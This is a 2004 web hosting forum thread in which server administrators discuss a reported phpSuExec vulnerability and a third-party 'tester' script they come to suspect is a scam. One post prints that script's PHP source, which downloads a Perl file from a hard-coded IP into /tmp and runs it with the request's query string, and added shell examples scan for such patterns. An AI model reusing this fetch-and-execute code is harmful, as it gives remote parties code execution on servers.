LBJ

Well-Known Member
Nov 1, 2003
cPanel Access Level
DataCenter Provider
Has anyone seen any details regarding a vulnerability in phpSuExec on cpanel servers where Apache was compiled with PHPSuExec before April 15th, 2004?

We received a brief email notification from a subscribed list about it but have been unable to dig up any corroboration.

I ran a search on the forum but was unable to find any related info.

Any pointers to some documentation would be most gratefully received.

LBJ
 

EDevil

Member
Feb 17, 2004
Can anyone confirm that recompiling apache using easyapache still leaves us with a vulnerable system?
 

Celta

Member
Aug 30, 2003
Can anyone confirm that recompiling apache using easyapache still leaves us with a vulnerable system?
Has anyone successfully fixed this vulnerability? I have recompiled too but the result is the same. I'm using Apache 1.3.31 - PHP 4.3.6 right now, but the tester PHP script shows I am still vulnerable :/

I'd like to know what options you check on WHM when building apache.

Thanks in advance.
 

SarcNBit

Well-Known Member
Oct 14, 2003
From the linked article:
"I already notified the cPanel authors of this vulnerability and it has been repaired."
Does anyone know the changelog entry or Bugtraq ID for this?

I see that they are now saying that the security audit is 70% complete.
 

Celta

Member
Aug 30, 2003
It worked! :)

Note that when switching to phpsuexec, all customers must remove php_flags lines from .htaccess, and all .php files must be owned by their respective users.
Changing that, I've corrected 99% of failures.

Still to figure out why some scripts (i.e. Typo3) don't work :/ (maybe symlink issues in PHP files?)
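
The two phpsuexec breakages named in the post above (PHP directives left in .htaccess, and .php files not owned by the account user) can be checked per web root. This is an added example, not part of the thread and not cPanel's code; the function names, the sample path and user, and the inclusion of php_value alongside php_flag are assumptions.

```shell
#!/bin/sh
# Added example: audit one account's web root for phpsuexec compatibility.
# Uses only POSIX find/grep; the path and user are supplied by the caller.

# List .htaccess files that still carry mod_php directives.
# php_value is matched as well (assumption: it breaks the same way as
# php_flag once PHP no longer runs as an Apache module).
htaccess_php_directives() {
    find "$1" -type f -name .htaccess -exec \
        grep -lEi '^[[:space:]]*php_(flag|value)[[:space:]]' {} + || :
    # "|| :" because grep exits 1 when no file matches, which is the clean case
}

# List .php files under $1 that are not owned by user $2 (name or numeric uid).
php_wrong_owner() {
    find "$1" -type f -name '*.php' ! -user "$2" -print
}

# Run both checks, print findings, return non-zero if anything needs fixing.
audit_docroot() {
    ht=$(htaccess_php_directives "$1")
    own=$(php_wrong_owner "$1" "$2")
    if [ -n "$ht" ]; then printf '%s\n' ".htaccess with PHP directives:" "$ht"; fi
    if [ -n "$own" ]; then printf '%s\n' ".php not owned by $2:" "$own"; fi
    [ -z "$ht$own" ]
}

# Example call (constructed path and user):
#   sh audit.sh /home/alice/public_html alice
if [ "$#" -eq 2 ]; then audit_docroot "$1" "$2"; fi
```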
 

eazistore

Well-Known Member
Nov 7, 2003
Singapore
vulnerability fix?

Originally posted by Celta
Has anyone successfully fixed this vulnerability? I have recompiled too but the result is the same. I'm using Apache 1.3.31 - PHP 4.3.6 right now, but the tester PHP script shows I am still vulnerable :/

I'd like to know what options you check on WHM when building apache.

Thanks in advance.
We are running WHM 9.3.0 cPanel 9.3.0-C55
Fedora - WHM X v3.1.0

Apache Core :1.3.31
PHP Suexec: 0.1b

After doing the cpanel.php test, we get this result:
http://www.eazistore.com/cpanel.php

Performing white box security audit...
PASSED: cPanel INSTALLED (9.3.0-CURRENT_55)
PASSED: Privileged UID Vulnerability Check (32022)
FAILED: Stealth Snoop Vulnerability [/home/eazistor] Explain
PASSED: Simple $HOME Scanning [/home/eazistor]
PASSED: Group $HOME Scanning [/home/eazistor]
PASSED: Root /home scanning
PASSED: Simple WEBROOT Protection
PASSED: Real WEBROOT Protection
PASSED: SUEXEC mod_phpsuexec Exploit Test
FAILED: One or more insecure cPanel configurations were detected. Visit A-Squad.Com for details on where to find more secure cPanel hosting.


Any suggestion how to fix the FAILED status?

Sincerely,
Vincent
http://www.eazistore.com/
 

goodmove

Well-Known Member
May 12, 2003
If you can execute the cpanel.php script, that means you are also vulnerable for allowing scripts to run from your /tmp directory.

Cpanel.php fetches a .pl file from an obscure IP address and runs it from /tmp directory.
 

tAzMaNiAc

Well-Known Member
Feb 16, 2003
Sachse, TX
A-Squad is using this as an advertisement for themselves as a hoster. :)

That's a no-no.

"If you host with A-Squad, you'll be safe."

That already turned me off.
 

eazistore

Well-Known Member
Nov 7, 2003
Singapore
Re: hi

Originally posted by shann
hi eazistore,

I have the same status coming. Did you get any fix? Please update it.

Thank You
Shann
Hello Shann,

After reading a few posts above us here, I am starting to smell a fish too. It looks like it's an advertisement to use their services. Visit ??????.Com for details on where to find more secure cPanel hosting.

I am not too sure if it's really an advertisement or just a scam to bring sales.

What's your comment, Shann?

Rgds,
Vincent
http://www.eazistore.com
 

shann

Well-Known Member
Jul 5, 2002
cPanel Access Level
Website Owner
hi

Hi,

I haven't looked deeply at the script. We should consult with others on this forum as well.

I am not sure about this .pl script run from /tmp, if it runs from there then we are in trouble.

Let me do more investigation and post it here.

shann
 

eazistore

Well-Known Member
Nov 7, 2003
69
0
156
Singapore
/tmp

Originally posted by shann
Hi,

I haven't looked deeply at the script. We should consult with others on this forum as well.

I am not sure about this .pl script run from /tmp, if it runs from there then we are in trouble.

Let me do more investigation and post it here.

shann
Hi Shann,

From what I see inside the code:
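<?php
// Local path where the downloaded Perl script is saved
$tester = "/tmp/tests.pl";
if (!file_exists($tester)) {
    $testw = fopen($tester, "w");
    // Sends this file's path as the User-Agent of the request below
    ini_set('user_agent',__FILE__);
    // Downloads tests.pl from the remote host and writes it to /tmp
    $testr = fopen("http://64.240.171.106/tests.pl","r");
    while ($s=fread($testr, 1024)) { fwrite($testw,$s); };
    fclose($testw);
    fclose($testr);
}
// Runs the downloaded script with perl, passing the request's query string, and prints its output
echo `perl $tester '$QUERY_STRING' 2>&1`;
?>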


I might not know much about PHP scripts but this line looks suspicious: $tester = "/tmp/tests.pl";

I have removed that cpanel.php file from my server so as not to cause any harm to it.

I hope some coder can explain if that script could cause any harm.

Rgds,
Vincent Kam
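
The cpanel.php listing above combines two things in one file: it opens a remote URL and it runs a shell command. As an added example (not part of the thread, and not A-Squad's or cPanel's code), this triage scan lists PHP files under a directory that show both traits; the function name and the regular expressions are assumptions, and hits need manual review.

```shell
#!/bin/sh
# Added example: flag PHP files that both open a remote URL and run a shell
# command, the combination seen in the cpanel.php listing in this thread.
# Heuristic only: expect false positives and false negatives.

remote_fetch_and_exec() {
    # Pass 1: files where a stream/include call is given an http(s)/ftp URL.
    find "$1" -type f -name '*.php' -exec \
        grep -lEi "(fopen|file_get_contents|include|require)[^;]*[\"'](https?|ftp)://" {} + 2>/dev/null |
    while IFS= read -r f; do
        # Pass 2: the same file also uses backticks or a command-execution call.
        if grep -Eqi '`[^`]+`|(^|[^a-z_])(system|exec|shell_exec|passthru|popen|proc_open)[[:space:]]*\(' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Example call (constructed path):
#   sh scan.sh /home/alice/public_html
if [ "$#" -eq 1 ]; then remote_fetch_and_exec "$1"; fi
```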
 

eazistore

Well-Known Member
Nov 7, 2003
Singapore
tests.pl code

Originally posted by shann
Hi,

I haven't looked deeply at the script. We should consult with others on this forum as well.

I am not sure about this .pl script run from /tmp, if it runs from there then we are in trouble.

Let me do more investigation and post it here.

shann
Hi,

I have looked into my /tmp and indeed there is a tests.pl in it!
I deleted it immediately to avoid trouble, of course.

Here's the tests.pl contents if anybody would like to inspect it.